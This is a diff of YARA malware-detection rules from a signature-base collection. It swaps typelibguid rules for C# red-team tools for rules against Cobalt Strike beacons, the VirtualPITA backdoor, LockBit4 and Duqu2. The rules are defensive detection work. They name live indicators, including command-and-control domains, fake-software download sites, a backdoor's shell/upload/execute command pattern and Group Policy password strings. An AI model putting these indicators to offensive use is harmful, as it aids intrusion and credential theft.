+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gpp_cpassword.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bae17954d54753fe1ce9c04c16fc8bdf43c11994f53a13106441170e310dc3d5"
-		score = 75
+		logic_hash = "de37dc77d9a2462f5d54ad5225405c6d95dad39e67a893f5442b26dc641a20f9"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii wide
-		$typelibguid0up = "EAAFA0AC-E464-4FC4-9713-48AA9A6716FB" ascii wide
+		$s1 = / cpassword=\"[^\"]/ ascii
+		$s2 = " changeLogon=" ascii
+		$s3 = " description=" ascii
+		$s4 = " acctDisabled=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0x3C3F786D and filesize < 1000KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Logger : FILE
+rule SIGNATURE_BASE_Cobaltstrike_Resources_Beacon_Dll_V3_8_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "82937fef-8280-5bc6-af4a-55c5cb3a7553"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/xxczaki/logger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L792-L806"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
+		author = "gssincla@google.com"
+		id = "6c65cbf8-2c60-5315-b3b2-48dfcee75733"
+		date = "2022-11-18"
+		modified = "2023-12-05"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_cobaltstrike.yar#L1020-L1061"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
+		logic_hash = "cde078a6ae7d0d835900e85498cf5ae20663ba8d5d3f912810e157261561e16a"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
+		$c2_1 = "ns7.softline.top" xor
+		$c2_2 = "ns8.softline.top" xor
+		$c2_3 = "ns9.softline.top" xor
+
+	condition:
+		$version_sig and $decoder and ( 2 of ( $c2_* ) or $xmrig_srcpath )
+}
+rule SIGNATURE_BASE_MAL_Fake_Document_Software_Indicators_Nov23 : FILE
+{
+	meta:
+		description = "Detects indicators of fake document/image utility software that acts as a downloader for additional malware"
+		author = "Jonathan Peters"
+		id = "231474cd-1ec9-5738-bf48-ef707689056d"
+		date = "2023-11-13"
+		modified = "2024-04-24"
+		reference = "https://nochlab.blogspot.com/2023/09/net-in-javascript-fake-pdf-converter.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_fake_document_software.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0967d1278c72da256a647f45369d7ba4de8c17698d23d2e06d3723372a676634"
-		score = 75
+		logic_hash = "5f0a088bf672559fbac90313768d41b79be7f1f56c6ddb36f0dcd265a07f98b2"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac5356ae011effb9d401bf428c92a48cf82c9b61f4c24a29a9718e3379f90f1d"
+		hash2 = "d1c29c2243c511ca3264ad568a6be62f374e104b903eca93debce6691e1c5007"
 
 	strings:
-		$typelibguid0lo = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii wide
-		$typelibguid0up = "9E92A883-3C8B-4572-A73E-BB3E61CFDC16" ascii wide
+		$ = "tweakscode.com" wide
+		$ = "www.createmygif.com" wide
+		$ = "www.videownload.com" wide
+		$ = "www.pdfconverterz.com" wide
+		$ = "www.pdfconvertercompare.com" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Internal_Monologue : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ce2773a2-b0b7-560e-ba21-3f018ddcacb3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/eladshamir/Internal-Monologue"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L808-L824"
+		description = "Finds opcodes to set a port to bind on 2233, encompassing the setsockopt(), htons(), and bind() from 40973d to 409791 in fe34b7c071d96dac498b72a4a07cb246 (may produce some FPs - comment by Florian Roth)"
+		author = "Mandiant"
+		id = "bdfbe29a-f7db-50d9-a909-d4ca96cc0731"
+		date = "2023-11-25"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5de43de183553732e48e41d17f441008f0637610d4c15f7f2012437b70750c2c"
-		score = 75
-		quality = 85
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "7641f964cc4a7671a9a3438aad1c653ef3fda3887313846cbe838b275a098190"
+		score = 60
+		quality = 45
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii wide
-		$typelibguid0up = "0C0333DB-8F00-4B68-B1DB-18A9CACC1486" ascii wide
-		$typelibguid1lo = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii wide
-		$typelibguid1up = "84701ACE-C584-4886-A3CF-76C57F6E801A" ascii wide
+		$x = {8b ?? ?? 4? b8 04 00 00 00 [0 - 4] ba 02 00 00 00 be 01 00 00 00 [0 - 2] e8 ?? ?? ?? ?? 89 4? ?? 83 7? ?? 00 79 [0 - 50] ba 10 00 00 00 [0 - 10] e8}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_GRAT2 : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e731d563-0d16-5f84-8127-624a71f8b646"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/r3nhat/GRAT2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L826-L840"
+		description = "Finds opcodes to decode and parse the recieved data in the socket buffer in fe34b7c071d96dac498b72a4a07cb246.  Opcodes from 401a36 to 401adc"
+		author = "Mandiant"
+		id = "6a59cc54-e1a0-594f-9efb-af63d5c05259"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L17-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b4ac181d6bdb40eb58326c00c93ee6d6e78d7cbdb382422873d7f744ad0ec2a1"
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "56a3e1b13f0955a780f882e62003f721e409a1fdf61120dd295941605dbf21a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii wide
-		$typelibguid0up = "5E7FCE78-1977-444F-A18E-987D708A2CFF" ascii wide
+		$x = {85 c0 74 ?? c7 05 ?? ?? ?? ?? fb ff ff ff c7 8? ?? ?? ?? ?? 00 00 00 00 e9 ?? ?? ?? ?? 4? 8b 05 ?? ?? ?? ?? 4? 83 c0 01 4? 89 05 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 e9 ?? ?? ?? ?? 8b 4? ?? 4? 98 4? 8d 9? ?? ?? ?? ?? 4? 8d ?? e0 4? 8b 0? 4? 89 0? 4? 8b 4? ?? 4? 89 4? ?? 8b 4? ?? 4? 98 4? 8d b? ?? ?? ?? ?? b? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 eb ?? 8b 4? ?? 8b 4? ?? 01 c1 8b 4? ?? 03 4? ?? 4? 98 0f b6 9? ?? ?? ?? ?? 8b 4? ?? 4? 98 0f b6 8? ?? ?? ?? ?? 31 c2 4? 63 c1 88 9? ?? ?? ?? ?? 83 4? ?? 01}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Powershdll : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f582a47-078e-525f-9d02-4ee7a455a3b2"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/p3nt4/PowerShdll"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L842-L856"
+		description = "Finds opcodes from 409dd8 to 409e46 in fe34b7c071d96dac498b72a4a07cb246 to set the HISTFILE environment variable to 'F' with a putenv() after loading each character individually."
+		author = "Mandiant"
+		id = "29ea2db0-4ab2-5e9c-8d42-7590ceabf99a"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L30-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b000c10d55d7d8902c036306dd51a5f3d32b83e88c081f337140e448c2cd836e"
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "6f44d516b3cbe54542ae0991aad49274fc4728570e9498b319fc98840ceb7d7d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii wide
-		$typelibguid0up = "36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21" ascii wide
+		$x = {4? 8b 4? ?? c6 00 48 4? 8b 4? ?? 4? 83 c0 05 c6 00 49 4? 8b 4? ?? 4? 83 c0 01 c6 00 49 4? 8b 4? ?? 4? 83 c0 06 c6 00 4c 4? 8b 4? ?? 4? 83 c0 02 c6 00 53 4? 8b 4? ?? 4? 83 c0 07 c6 00 45 4? 8b 4? ?? 4? 83 c0 03 c6 00 54 4? 8b 4? ?? 4? 83 c0 08 c6 00 3d 4? 8b 4? ?? 4? 83 c0 04 c6 00 46 4? 8b 4? ?? 4? 83 c0 09 c6 00 00 4? 8b 7? ?? e8}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpamsibypass : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ca97004e-edc1-5b5a-ac67-e81ae24631aa"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/WayneJLee/CsharpAmsiBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L858-L872"
+		description = "Finds opcodes from 401f1c to 401f4f in fe34b7c071d96dac498b72a4a07cb246 to decode text with multiple XORs"
+		author = "Mandiant"
+		id = "58d4db75-fcd5-50c2-93ba-a8a4718ac0f6"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L43-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c422c6b2dc54f5d62a4e5e85da4add5d0bf4eb5107f6778a45835649581a5517"
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "aaf2ff682c619d2a254fe069d477654a161658db6315239f1b956141b6a72c01"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii wide
-		$typelibguid0up = "4AB3B95D-373C-4197-8EE3-FE0FA66CA122" ascii wide
+		$x = {4? 8b 4? ?? 4? 83 c1 30 4? 8b 4? ?? 4? 8b 10 8b 4? ?? 4? 98 4? 8b 04 ?? ?? ?? ?? ?? 4? 31 c2 4? 8b 4? ?? 4? 83 c0 28 4? 8b 00 4? c1 e8 10 0f b6 c0 4? 98 4? 8b 04}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hastyseries : FILE
+rule SIGNATURE_BASE_M_Hunting_Python_Backdoor_Commandparser_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0d35acf4-c763-593c-94e2-c499d3826375"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/obscuritylabs/HastySeries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L874-L906"
+		description = "Finds strings indicative of the vmsyslog.py python backdoor."
+		author = "Mandiant"
+		id = "15cbca01-24e6-5538-bcfd-c3222337aaf5"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L57-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79bbcc46c8a327b6d0aec61ceb8516a097f02ac71e692d22f1893a529a011f44"
-		score = 75
-		quality = 85
+		hash = "61ab3f6401d60ec36cd3ac980a8deb75"
+		logic_hash = "eefc255079e914ac81d53baf4ae159052bfda4c670e8300306c0899b3ad00a48"
+		score = 50
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8435531d-675c-4270-85bf-60db7653bcf6" ascii wide
-		$typelibguid0up = "8435531D-675C-4270-85BF-60DB7653BCF6" ascii wide
-		$typelibguid1lo = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii wide
-		$typelibguid1up = "47DB989F-7E33-4E6B-A4A5-C392B429264B" ascii wide
-		$typelibguid2lo = "300c7489-a05f-4035-8826-261fa449dd96" ascii wide
-		$typelibguid2up = "300C7489-A05F-4035-8826-261FA449DD96" ascii wide
-		$typelibguid3lo = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii wide
-		$typelibguid3up = "41BF8781-AE04-4D80-B38D-707584BF796B" ascii wide
-		$typelibguid4lo = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii wide
-		$typelibguid4up = "620ED459-18DE-4359-BFB0-6D0C4841B6F6" ascii wide
-		$typelibguid5lo = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii wide
-		$typelibguid5up = "91E7CDFE-0945-45A7-9EAA-0933AFE381F2" ascii wide
-		$typelibguid6lo = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii wide
-		$typelibguid6up = "C28E121A-60CA-4C21-AF4B-93EB237B882F" ascii wide
-		$typelibguid7lo = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii wide
-		$typelibguid7up = "698FAC7A-BFF1-4C24-B2C3-173A6AAE15BF" ascii wide
-		$typelibguid8lo = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii wide
-		$typelibguid8up = "63A40D94-5318-42AD-A573-E3A1C1284C57" ascii wide
-		$typelibguid9lo = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii wide
-		$typelibguid9up = "56B8311B-04B8-4E57-BB58-D62ADC0D2E68" ascii wide
+		$key1 = "self.conn.readInt8()" ascii
+		$key2 = "upload" ascii
+		$key3 = "download" ascii
+		$key4 = "shell" ascii
+		$key5 = "execute" ascii
+		$re1 = /def\srun.{,20}command\s?=\s?self\.conn\.readInt8\(\).{,75}upload.{,75}download.{,75}shell.{,75}execute/s
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dreamprotectorfree : FILE
+rule SIGNATURE_BASE_Octowave_Installer_03_2025 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9ebee989-3441-5a76-b243-08de978b541c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Paskowsky/DreamProtectorFree"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L908-L922"
+		description = "Detects resources embedded within Octowave Loader MSI installers"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "56685a0a-523d-4060-a008-aa28542cb85c"
+		date = "2025-03-28"
+		modified = "2025-04-08"
+		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_installer_mar25.yar#L1-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04c6daa23bbca852f83853e717c81622130beb3ac2551f8c3e23d2ec75aa0376"
+		logic_hash = "14b6247cf619ecb8f14fc0a860fa4285e58db2defa15488cda1b2431b3e3e980"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05b025b8475c0acbc9a5d2cd13c15088a2fb452aa514d0636f145e1c4c93e6ee"
+		hash2 = "500462c4fb6e4d0545f04d63ef981d9611b578948e5cfd61d840ff8e2f206587"
+		hash3 = "5ee9e74605b0c26b39b111a89139d95423e54f7a54decf60c7552f45b8b60407"
+		hash4 = "76efc8c64654d8f2318cc513c0aaf0da612423b1715e867b4622712ba0b3926f"
+		hash5 = "c3e2af892b813f3dcba4d0970489652d6f195b7985dc98f08eaddca7727786f0"
+		hash6 = "d7816ba6ddda0c4e833d9bba85864de6b1bd289246fcedae84b8a6581db3f5b6"
+		hash7 = "e93969a57ef2a7aee13a159cbf2015e2c8219d9153078e257b743d5cd90f05cb"
+		hash8 = "45984ae78d18332ecb33fe3371e5eb556c0db86f1d3ba8a835b72cd61a7eeecf"
 
 	strings:
-		$typelibguid0lo = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii wide
-		$typelibguid0up = "F7E8A902-2378-426A-BFA5-6B14C4B40AA3" ascii wide
+		$string1 = "LaunchConditionsValidateProductIDProcessComponentsUnpublishFeaturesRemoveFilesRegisterUserRegisterProductInstalled OR PhysicalMemory >= 2048" ascii
+		$string2 = ".cab" ascii
+		$string3 = ".wav" ascii
+		$string4 = ".dll" ascii
+		$supporting1 = ".raw" ascii
+		$supporting2 = ".db" ascii
+		$supporting3 = ".pak" ascii
+		$supporting4 = ".bin" ascii
+		$supporting5 = ".bak" ascii
+		$supporting6 = ".dat" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 200000KB and all of ( $string* ) and 1 of ( $supporting* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Redsharp : FILE
+
+rule SIGNATURE_BASE_APT12_Malware_Aug17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2aa62d61-075c-5664-a7fc-2b9d84b954ed"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/padovah4ck/RedSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L924-L938"
+		description = "Detects APT 12 Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6c9cd68f-b839-5c99-a9f5-14c2d8a28bec"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt12_malware.yar#L13-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b611422c3bd8d3ed713cbeabadef0402dfdee42e8bbe563b054dc582945d8519"
+		logic_hash = "0766376689540680f8db699f64aa89fc32ddef619a74864eb816c598b8d08c8a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$typelibguid0lo = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii wide
-		$typelibguid0up = "30B2E0CF-34DD-4614-A5CA-6578FB684AEA" ascii wide
+		hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
+		hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "9ba915fd04f248ad62e856c7238c0264" )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_ESC : FILE
+rule SIGNATURE_BASE_Mal_Lockbit4_Rc4_Win_Feb24 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a57c47e8-62bf-5425-9735-35a3e3a0c218"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NetSPI/ESC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L940-L956"
+		description = "Detect the implementation of RC4 Algorithm by Lockbit4.0"
+		author = "0x0d4y"
+		id = "4de48ced-b9fa-4286-aac4-c263ad20d67d"
+		date = "2024-02-13"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_rc4_win_feb24.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff959136f219b082dd9b601dbf2fea41265ce08a4cf57e368b2b4ac1f09ea698"
-		score = 75
+		hash = "062311f136d83f64497fd81297360cd4"
+		logic_hash = "85e8087f875c45ce39b7014fc0737dc86f1e18d4643fdbb0a80d18feff774680"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$typelibguid0lo = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii wide
-		$typelibguid0up = "06260CE5-61F4-4B81-AD83-7D01C3B37921" ascii wide
-		$typelibguid1lo = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii wide
-		$typelibguid1up = "87FC7EDE-4DAE-4F00-AC77-9C40803E8248" ascii wide
+		$rc4_alg = { 48 3d 00 01 00 00 74 0c 88 84 04 ?? ?? ?? ?? 48 ff c0 eb ec 29 c9 41 b8 ?? ?? ?? ?? 4c 8d 0d 15 7b 00 00 45 31 d2 48 81 f9 00 01 00 00 74 34 44 8a 9c 0c ?? ?? ?? ?? 45 00 da 89 c8 99 41 f7 f8 46 02 14 0a 41 0f b6 c2 8a 94 04 ?? ?? ?? ?? 88 94 0c ?? ?? ?? ?? 44 88 9c 04 ?? ?? ?? ?? 48 ff c1 eb c3 29 c0 48 8b 0d 14 9e 00 00 31 d2 45 29 c0 48 3d ?? ?? ?? ?? 74 4b 41 ff c0 45 0f b6 c0 46 8a 8c 04 ?? ?? ?? ?? 44 00 ca 44 0f b6 d2 46 8a 9c 14 ?? ?? ?? ?? 46 88 9c 04 ?? ?? ?? ?? 46 88 8c 14 ?? ?? ?? ?? 46 02 8c 04 ?? ?? ?? ?? 45 0f b6 c9 46 8a 8c 0c ?? ?? ?? ?? 44 30 0c 01 48 ff c0 eb ad }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $rc4_alg
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharp_Loader : FILE
+rule SIGNATURE_BASE_Duqu2_Sample1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bf0c3d93-cbea-54c7-b950-fd4e5a600d07"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Csharp-Loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L958-L972"
+		description = "Detects malware - Duqu2 (cross-matches with IronTiger malware and Derusbi)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39ba04f1-df45-5513-ab8f-12097a79cdc7"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff65463c10a7f4940f4dedef42707fe7feacded52d75014245e1961d1c80e845"
-		score = 75
+		logic_hash = "bf6b60bcae2b41487ede11581c82b32e6bc912445008b1655e4f75be65cf6596"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b146e3a59025d7085127b552494e8aaf76450a19c249bfed0b4c09f328e564f"
+		hash2 = "8e97c371633d285cd8fc842f4582705052a9409149ee67d97de545030787a192"
+		hash3 = "2796a119171328e91648a73d95eb297edc220e8768f4bbba5fb7237122a988fc"
